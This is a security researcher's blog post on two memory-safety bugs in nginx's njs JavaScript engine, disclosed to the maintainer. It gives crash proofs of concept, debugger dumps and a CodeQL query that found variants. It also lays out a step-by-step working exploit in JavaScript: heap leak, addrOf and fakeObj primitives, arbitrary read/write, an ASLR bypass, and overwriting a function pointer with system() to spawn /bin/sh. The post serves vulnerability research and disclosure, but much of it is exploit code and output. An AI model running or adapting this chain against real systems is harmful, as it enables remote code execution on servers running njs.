Hunting bugs in Nginx JavaScript engine (njs)
Hello world,
I spent the last few weekends on a new target: njs, a JavaScript interpreter that is being used as part of the nginx webserverβs backend. Essentially, my goal is to find a way to break out of the interpreterβs sandbox without using require("child_process");
and friends.
After doing some fuzzing, I found two bugs. Then, used CodeQL to find more variants(!)
Below is a description of the bugs:
Note: The research was conducted on commit
74854b6edaa8a76fdc96395cdc7fbdfcd01425b6
, which is the latest at the time of the research(May 2024).
Bug #1 - Type Confusion
Description
The implementation of Array.prototype.toSpliced
has a bug that allows you to get an array with un-initilized heap memory.
This could be leveraged to a type confusion primitive by:
- Allocating
Uint8Array
buffer, the buffer wil contain bytes that form a njs_value_t object. - Freeβing it
- Allocating an array using
Array.prototype.toSpliced
, the memory in this array will not be initilized because we trigger our bug. The address of this array will be the same address we freeβd in step 2. - Profit, now we have an array with fake
njs_value_t
elements.
PoC
The PoC below triggers a segfault:
function trigger() {
let buggy_arr = new Array(0x10);
let retval;
Object.defineProperty(buggy_arr, 0, { get: (s) => { throw new Error("brrrrr"); } });
try { retval = buggy_arr.toSpliced(0,0); } catch (e) { console.log(`error: ${e}`); }
return retval;
}
let buggy = [];
buggy = trigger();
console.log('triggering bug');
buggy.toString(); // segfault
Analysis
In Array.prototype.toSpliced
/ njs_array_prototype_to_spliced
, the code performs the following:
- allocate an array
- assign the ptr to
retval
by callingnjs_set_array()
- access the array members(which also trigger getter/setters) to populate the new arrayβs content
- if something goes wrong, abort and return
NJS_ERROR
array = njs_array_alloc(vm, 0, new_length, 0); // [1]
if (njs_slow_path(array == NULL)) {
return NJS_ERROR;
}
njs_set_array(retval, array); // [2]
for (i = 0; i < start; i++) {
ret = njs_value_property_i64(vm, this, i, &value); // [3]
if (njs_slow_path(ret == NJS_ERROR)) { // [4]
return NJS_ERROR;
}
ret = njs_value_create_data_prop_i64(vm, retval, i, &value, 0);
if (njs_slow_path(ret != NJS_OK)) {
return ret;
}
}
The problem is in step 2, we assign the new pointer to retval
too early.
We assign to retval
a heap chunk with un-initialized data, then, the throw new Error()
exception(triggered by our getter) makes the function to bail out in the middle of the toSpliced
operation, before the memory pointed by retval
is fully initialized.
Visually, this is how retval
variable is represented in memory:
As you can see, this is a JavaScriptβs Array
with elements, each element has a size of 16 bytes and represented with a njs_value_t
struct.
Exploit
Initial Exploit
So far, I came up with this, which is pretty similar to the initial PoC but with a few more strings and changes to the allocation sizes:
function trigger() {
let buggy_arr = new Array(0x40);
let retval;
Object.defineProperty(buggy_arr, 0, { get: (s) => { throw new Error("brrrrr"); } });
try { retval = buggy_arr.toSpliced(0,0); } catch (e) { console.log(`error: ${e}`); }
return retval;
}
// --- main ---
let buggy = [];
trigger();
buggy = trigger();
console.log('triggering bug');
console.log(`length = ${buggy.length}`);
// isNaN(buggy);
console.log(buggy[2]);
Iβm still working on figuring out how to shape the heap correctly, but so far I managed to create a scenario where buggy[0]
lands on a glibcβs main_arena
pointer.
gefβ€ print value->data->u.array->start
$5 = (njs_value_t *) 0x555555649000
gefβ€ hexdump byte 0x555555649000
0x0000555555649000 10 83 c4 f7 ff 7f 00 00 10 83 c4 f7 ff 7f 00 00 ................ <---- buggy[0]
0x0000555555649010 f0 8f 64 55 55 55 00 00 f0 8f 64 55 55 55 00 00 ..dUUU....dUUU.. buggy[1]
0x0000555555649020 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ ...
0x0000555555649030 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000555555649040 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000555555649050 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000555555649060 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000555555649070 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
gefβ€ x/gx 0x0000555555649000
0x555555649000: 0x00007ffff7c48310
gefβ€ info symbol 0x00007ffff7c48310
main_arena + 1680 in section .data of /lib/x86_64-linux-gnu/libc.so.6
It might be useful, but Iβm not interested in this type of primitive. Iβd like to make it re-usable(if thatβs the term)/njs-oriented, like achieving a fake njs_value_t
in order to build my way up to arbitrary r/w β code exec.
If anyone wants to work on this together lmk :β)
UPDATE(31/May/2024): I brainstormed with @iamgweej about this bug and how it is possible to leverage it to RCE. The exploit is now ready! details are below
Full Exploit
Iβve been scratching my head for awhile on how to approach this bug, but then a friend(@iamgweej) came to the rescue. We worked on this together by peeking at the allocatorβs logic. Eventually he found the way to achieve what I describe in Step 0 of the exploit-dev proccess. That one fxcking thing allowed us to continue and weaponize this bug to achieve stronger primitives and write our own exploits.
Links to the exploits:
- @iamgweejβs exploit: https://gist.github.com/iamgweej/7dd5f1e902b1de1c6bdf9b5b653e339b
- My exploit: https://github.com/0xbigshaq/njs-vr/blob/main/exp.js
Below is a breakdown of my exp.js, how it works and the logic behind it.
Step 0 - Heap leak
To get a heap leak, we allocate a chunk with a size that is not njs_is_power_of_two()
. This will βbreak alignmentβ of the chunk. As a result, the NJS engine will decide to round up the size and push a njs_mp_block_t
struct in the remaining space(at the end of the chunk).
} else {
aligned_size = njs_align_size(size, sizeof(uintptr_t));
p = njs_memalign(alignment, aligned_size + sizeof(njs_mp_block_t));
if (njs_slow_path(p == NULL)) {
return NULL;
}
block = (njs_mp_block_t *) (p + aligned_size);
type = NJS_MP_EMBEDDED_BLOCK;
}
This can help us if we:
- Create a
Uint8Array
buffer with a size that is not a power of two. - In the last 8 bytes of the byte array - craft a fake array element/
njs_value_t
and set its type to be anNJS_STRING
with a size below 0xf to make it a βshort stringβ(=Strings that are below 15 characters are embededd within the remaining space ofnjs_value_t
.) - Free the
Uint8Array
by callingUint8Array.prototype.sort()
(ref: njs_typed_array.c#L2048) - Trigger the bug and get the chunk we freeβd.
- At this point we confused the contents of the freeβd
Uint8Array
buffer with a JavaScriptβsArray
whose memory is not initialized(==still contains the contents of theUint8Array
). - Access the last element of the
Array
, it should be a shortNJS_STRING
containing the data ofnjs_mp_block_t
(previously was part of theUint8Array
, accommodating its last 8 bytes).
Below is a PoC for the heap leak:
// globals
const BUFSIZE = 0x410;
let u8Arr = new Uint8Array(BUFSIZE+8);
// helpers
const sus_func = (s) => {
throw new Error("brrrrr");
}
function trigger() {
let retval;
let buggy_arr = new Array(0x100);
Object.defineProperty(buggy_arr, 0, { get: sus_func });
u8Arr.sort((x, y) => { return false; }); // free the uint8 buffer, this will be our forged arr
try {
retval = buggy_arr.toSpliced((BUFSIZE/0x10 + 1)); // trigger bug / alloc and bail-out
} catch (e) { }
return retval;
}
function ptr_u64(buff) {
var int = buff[0];
for (var i = 1; i < buff.length; i++) {
int += (buff[i] * Math.pow(2, 8 * i));
}
return int;
}
function get_heapleak() {
let fake_arr;
// metadata
u8Arr[0x10 * 0x41 + 0] = 5; // type: string
u8Arr[0x10 * 0x41 + 1] = 0xfe; // short string
u8Arr[0x10 * 0x41 + 2] = 0;
u8Arr[0x10 * 0x41 + 3] = 0;
u8Arr[0x10 * 0x41 + 4] = 0x42;
u8Arr[0x10 * 0x41 + 5] = 0x42;
u8Arr[0x10 * 0x41 + 6] = 0x42;
u8Arr[0x10 * 0x41 + 7] = 0x42;
fake_arr = trigger();
let leak = fake_arr[BUFSIZE/0x10];
let ptr_raw = Buffer.from(leak).slice(6);
return ptr_raw;
}
// main
let heap_ptr_raw, heap_ptr;
heap_ptr_raw = get_heapleak();
heap_ptr = ptr_u64(heap_ptr_raw);
console.log(`[*] heap leak = 0x${heap_ptr.toString(16)}`)
Output:
[*] heap leak = 0x55851b7e3fb8
We leaked (njs_mp_block_t*)->node.left
, nice :^)
Basically, we set the first 8 bytes of the njs_value_t
with type-info of a string, and the allocator wrote the other half for us(which is the stringβs content). Visually, this is how it looks like at runtime:
Step 1 - Getting an addrOf primitive
To figure out where we are on the heap, we can use the method from the previous step but with a small twist:
Now that we have a valid address in the VA space - we can forge another string, but with a greater length. We couldnβt do it previously because strings that have length above 15 requires a pointer to their contents. Now we have a valid pointer so we can leverage that to create even bigger OOB read primitive that will allow us to find the address of other objects on the heap.
To get an addrOf primitive, we:
- Allocate a
raw_buf = new Uint8Array(0x2000);
, this buffer will be used in the next steps to forge more complex objects to achieve arbitrary r/w. - call oob_read() and provide the heap pointer we leaked from the previous step. This helper func will use the same technique from the previous step but with a string that has a type of βlong stringβ, so we can dereference the pointer and get a large string(we confuse the elements of
(njs_string_t*)->start
with(njs_mp_block_t*)->node.right
and(njs_string_t*)->length
with(njs_mp_block_t*)->node.left
).oob_read()
will return a string that points somewhere on the heap, with a very large size.
- Then, we take the large string and search for the contents of
raw_buf
in it. - Once we find the offset of
raw_buf
within the large string, we can calculate the address of it by adding the offset to the pointer we leaked at step 0.
(Implementation of this part can be found @ exp.js#L208-L223)
output:
[*] long string length: 0x60dbde40
[*] offset: 451168
[?] addrof raw_buf = 0x55bf60e28420
Step 2 - Build a fakeObj primitive
To get arbitrary r/w, we:
- Trigger the bug again, this time we will make one of the elements of
fake_arr[5]
to be a JavaScriptβs TypedArray - This TypedArray information will point to the contents of
raw_buf
, which is controlled by us(we know its address from the previous step) - In
raw_buf[0x100]
, weβll spoof anjs_typed_array_t
struct that has a pointer to anjs_array_buffer_t
0x100 bytes after it.
(Implementation of this part can be found @ exp.js#L112-L139)
Now all we have to do is to manipulate the contents of raw_buf
to change where fakeObj
points to. This is done with the arb_read()
and arb_write()
helper functions @ exp.js#L141-L190
Step 3 - break ASLR
The allocator stores a function pointer to njs_mp_rbtree_compare()
in its chunksβ metadata(njs_mp.c#L217).
To find the base address of the njs binary, we can use our arb_read()
primitive to traverse through the allocatorβs red-black tree until we find a pointer to njs_mp_rbtree_compare
. This is implemented in exp.js#L229-L245 and from hereon - it shouldnβt be a problem to calculate any other address in the binary.
Step 4 - Get PC Control
At njs_process_script()
, thereβs a call to njs_console->engine->output()
:
static njs_int_t njs_process_script(njs_engine_t *engine, njs_console_t *console, njs_str_t *script)
{
njs_int_t ret;
ret = engine->eval(engine, script);
if (!console->suppress_stdout) {
engine->output(engine, ret);
}
The njs_engine_t::output
struct member is a function pointer that we can overwrite in order to takeover the execution flow. We set this to system()
as follows:
let njs_console = njs_base+0xc68c0;
console.log(`[*] njs_console @ 0x${njs_console.toString(16)}`);
let engine = ptr_u64(arb_read(njs_console));
console.log(`[*] njs_console->engine @ 0x${engine.toString(16)}`);
let fcn_ptr = engine+0x40; // engine->output() at offset 0x40
console.log(`[*] njs_console->engine->output @ 0x${fcn_ptr.toString(16)}`);
let libc_system = libc_base+0x50d70;
arb_write(engine, [0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x0]); /* "/bin/sh\x00" */
arb_write(fcn_ptr, ptr_p64(libc_system));
console.log("[*] jumping to system(), go go go");
When the script will end, it will trigger a call to system()
with a pointer to a njs_engine_t
struct(we changed its first bytes to /bin/sh\x00
to pop a shell).
output:
woop woop :^)
Note: Step 1 is still not 100% relaiable, iβm trying to look for ways to make it more stable. But overall, iβm very happy with the progress hehe
Spot more variants with CodeQL
I thought it could be useful to cook a CodeQL query that will detect if this pattern repeats itself in more places.
Essentially, the pattern is:
array = njs_array_alloc(vm, 0, length, 0); // allocating a new array
njs_set_array(retval, array); // assigning the value of `retval` too early
...
ret = njs_value_property_i64(...); // trigger accessors(a thing that can cause exceptions and make the execution to bail out)
Query(sorry for poor syntax):
import cpp
import semmle.code.cpp.dataflow.new.TaintTracking
import semmle.code.cpp.dataflow.new.DataFlow
import semmle.code.cpp.controlflow.ControlFlowGraph
from FunctionCall fc1, FunctionCall fc2, ExprStmt s, AssignExpr e, Expr source, Expr sink, Parameter retval, Function sus_func, Expr children, FunctionCall trig
where
// finding alloc & set_array
fc1.getTarget().hasName("njs_array_alloc")
and
fc2.getTarget().hasName("njs_set_array")
and
s = fc1.getEnclosingStmt()
and
e = s.getExpr()
and
source = e.getAChild()
and
sink = fc2.getArgument(1)
and
sus_func = fc2.getEnclosingFunction()
and
retval = sus_func.getParameter(4)
and
DataFlow::localFlow(DataFlow::exprNode(source), DataFlow::exprNode(sink))
and
DataFlow::localFlow(DataFlow::parameterNode(retval), DataFlow::exprNode(fc2.getArgument(0)))
/*
* We are supposed to use `ControlFlowGraph::successors_extended(src, dst)`
* but it didn't work out ;_; so I'm using `getASuccessor*()` with a weird `exists()` filter
*/
and
children = fc2.getASuccessor*()
and
trig.getTarget().getName().matches("%njs_value_property_i64%")
and
trig.getEnclosingFunction() = fc2.getEnclosingFunction()
and
exists( FunctionCall trig2 | (children = trig2 and trig=trig2))
select
source, sink ,trig as triggers, sus_func
This query yielded another two(!) vulnerable JS functions:
- Function: njs_array_prototype_to_spliced (β our original bug described here)
- Source: array = njs_array_alloc(vm, 0, new_length, 0);
- Sink: njs_set_array(retval, array);
- Trigger accessors: njs_value_property_i64_set(β¦);, njs_value_property_i64_set(β¦);
- Function: njs_array_prototype_to_sorted
- Source: array = njs_array_alloc(vm, 0, length, 0);
- Sink: njs_set_array(retval, array);
- Trigger accessors: njs_value_property_i64_set(β¦);, njs_value_property_i64_set(β¦);
- Function: njs_array_prototype_to_reversed
- Source: array = njs_array_alloc(vm, 0, length, 0);
- Sink: njs_set_array(retval, array);
- Trigger accessors: njs_value_property_i64(β¦);
Β
I was going to report about those too but then the project maintainer replied with this message to my initial report:
Thank you for the report and a good catch.
The root-cause here is in the step 2. We set a retval value too early. Unfortunately in NJS, the retval value will be visible outside the native JS function even if the exception was thrown. I found similar places in
Array.prototype.toSpliced() Array.prototype.toReversed() Array.prototype.toSorted()
ugh.
The moral of the story: ctrl+shift+f is faster than modeling a vulnerabillity with CodeQL.
It was a nice experience tho :^)
Bug #2 - OOB Read (could not exploit π)
Description
It is possible to achieve OOB Read primitive/leak heap memory via String.prototype.replaceAll()
.
The way NJS stores UTF-8 Strings is by storing a string buffer followed by βmapβ of offsets.
The documentation for it can be found in njs_string.h#L45-L71.
A specially-crafted JS script can trigger an off-by-one bug in the function that resolves an offset inside a UTF-8 string, which then can be leveraged to achieve a bigger Out-of-Bound read(more than just one byte).
PoC
Below is the PoC that the fuzzer generated:
String.fromCharCode(-1843190741).padStart(512).replaceAll(("repeat").substring(6));
After playing around with the logic to figure out what causes the crash, I came up with this PoC:
console.log('str11', 'str22'); // this will put `0x5a5a5a5a` on the heap once `njs_parser` frees memory.
// trigger bug
let foo = String.fromCharCode(0x100).padStart(0x80);
let bar = String.prototype.replaceAll.call(foo, '', 'w'); // segfault
Analysis
In njs_string_prototype_replace
(=String.prototype.replaceAll), during the last iteration of the do { ... } while (pos >= 0 ...);
loop, the call to njs_string_utf8_offset()
with a pos
that points to the last byte of the string is triggering an unexpected behavior:
p = njs_string_utf8_offset(string.start, string.start + string.size,
pos);
This is leading to an out-of-bound access, one element beyond the βutf-8 offset tableβ of the string:
const u_char *
njs_string_utf8_offset(const u_char *start, const u_char *end, size_t index)
{
/* ... */
start += map[index / NJS_STRING_MAP_STRIDE - 1];
/* ... */
return start;
}
which, in turns, advances the p
pointer by 0x140
bytes(a value that is clearly too big).
From debugging perspective, this is how the OOB looks like:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ source:src/njs_string.c+2090 ββββ
2085
2086 if (map[0] == 0) {
2087 njs_string_utf8_offset_map_init(start, end - start);
2088 }
2089
ββ 2090 start += map[index / NJS_STRING_MAP_STRIDE - 1];
2091 }
2092
2093 for (skip = index % NJS_STRING_MAP_STRIDE; skip != 0; skip--) {
2094 start = njs_utf8_next(start, end);
2095 }
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
gefβ€ print index
$61 = 0x100
gefβ€ print index/32-1
$62 = 0x7
gefβ€ print map[7]
$63 = 0x140
The offset 0x140
is not a real offset, but rather part of a pointer whose last bytes are 0x140:
gefβ€ x/wx map
0x613000002994: 0x00000020 --> map[0] first entry
0x613000002998: 0x00000040 --> map[1]
0x61300000299c: 0x00000060 --> map[2]
0x6130000029a0: 0x00000080 --> map[3]
0x6130000029a4: 0x000000a0 --> map[4]
0x6130000029a8: 0x000000c0 --> map[5]
0x6130000029ac: 0x000000e0 --> map[6] last entry
# ... continue reading, but switch to 8 byte alignment(bc this is 64bit system)
gefβ€ x/gx (0x6130000029ac+4)
0x6130000029b0: 0x0000610000000140
0x6130000029b8: 0x0000610000000140
0x6130000029c0: 0x0000613000002b80
0x6130000029c8: 0x00000130bebe0200
# another representation
gefβ€ print *map@10
$65 = {0x20, 0x40, 0x60, 0x80, 0xa0, 0xc0, 0xe0, 0x140, 0x6100, 0x140}
At first sight, I thought that the root cause of this is somewhere in njs_string_utf8_offset()
, but after reporting to the maintainer he helped me to notice that this is actually in njs_string_index_of()
!
Thank you for the report. I looked into the issue. The root cause is the fact that
njs_string_index_of()
which represent StringIndexOf() for zero-length search strings βfindsβ the search string even after the last character:
If searchValue is the empty String and fromIndex β€ the length of string, this algorithm returns fromIndex. The empty String is effectively found at every position within a string, including after the last code unit.
NJS stores strings as UTF8 (not as UTF16 with always 2 bytes characters), to efficiently find a char byte offset by its index NJS stores a sparse offset map after a string body (if a string is UTF8 and its length is >= 32 character).
The sparse map is available only for indices
[0, length - 1]
, so it is invalid to callnjs_string_utf8_offset()
with indices outside this range.Because
njs_string_index_of()
returns valid pos after the last characternjs_string_utf8_offset()
is called with index equal tostring.length
.It seems the bug is only visible when βthisβ string has >= 32 characters && s.length % 32 == 0.
Theoretical Exploit
Sadly, I could not exploit it due to those two lines at the end of the function:
njs_chb_append(&chain, p_start, string.start + string.size - p_start);
ret = njs_string_create_chb(vm, retval, &chain);
Because we achieved Out-of-Bound, it means that the p_start
will be bigger than string.start + string.size
, this causes chain.error
to become from 0 to 1.
As a result, the next line(which creates the final string/return value) will not generate the string since it checks whether chain.error
is true or false.
Theoretically, if we could somehow manage to make chain.error
stay 0, weβd be able to make the exploit work and leak heap data as follows:
let sus_char = String.fromCharCode(0x100); // 'Δ'
let foo = sus_char.padStart(0x100); // ' '...<repeats 0x100>'Δ'
let bar = null;
let shaping =String.fromCharCode(0x120);
shaping += String.fromCharCode(0x120);
// console.log(shaping);
console.log(`foo = '${foo}'`);
console.log(`foo.length = '${foo.length}'`);
console.log('triggering bug...');
bar = String.prototype.replaceAll.call(foo, '', 'w');
console.log('done!');
console.log(`bar = '${bar}'`);
console.log(`bar.length = '${bar.length}'`);
output:
foo = ' Δ'
foo.length = '256'
triggering bug...
done!
bar = 'w w w w w w w<..repeat..> w w w w w wΔοΏ½οΏ½οΏ½ @`οΏ½οΏ½οΏ½οΏ½@a@aοΏ½+0aοΏ½οΏ½0w'
bar.length = '576'
Maybe the verification of chain.error == 1
donβt exist in earlier versions of njs(?) idk, Iβll leave this as a task for the reader :^)
I hope this was informative, thanks for reading.